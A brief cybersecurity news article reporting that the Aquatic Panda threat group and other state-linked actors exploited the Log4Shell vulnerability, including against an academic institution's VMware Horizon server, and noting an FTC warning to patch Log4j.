Aquatic Panda, a Chinese threat group, is abusing the Log4j security vulnerability to attack large academic institutions. For further exploitation, the Aquatic Panda threat group has obtained credentials.
Aquatic Panda has been active since May 2020 and is exploiting Log4Shell (CVE-2021-44228), according to CrowdStrike.
Researchers noticed some unusual activities around a Tomcat server running on a vulnerable VMware Horizon instance which is operated by a prestigious academic institution.
The security firm was able to detect and mitigate the threat with the help of actionable alerts.
The Aquatic Panda threat group is known for stealing intellectual property and other trade secrets through the use of persistence tools.
In this attack, attackers were performing several connectivity checks through DNS lookups on a subdomain running under the Apache Tomcat service which was hosted on a VMware Horizon instance.
After that, the attackers executed a series of Linux commands, including curl and wget, as well as executing bash-shell with a hardcoded IP address.
The Aquatic Panda threat group was linked to the remote server used in these attacks.
Other Chinese and threat groups are also abusing the Log4j vulnerability, according to Mandiant and Microsoft.
Microsoft discovered attacks from HAFNIUM abusing the vulnerability against virtualization infrastructure by using DNS service which is usually associated with the testing activity to fingerprint systems.
Threat groups affiliated to Iran, Turkey, and North Korea have all used the Log4Shell vulnerability to launch attacks, according to Microsoft.
Meanwhile, the Federal Trade Commission (FTC) in the United States has issued a warning to businesses to resolve the flaw in the Java logging utility Log4j as soon as possible. Otherwise, it will take legal action against non-compliant businesses.
Log4j is used in a large number of applications that run on millions of systems across various industries, making the attack surface much larger than anticipated. Several government security agencies and private companies have already issued warnings on the abuse of Log4j’s vulnerabilities.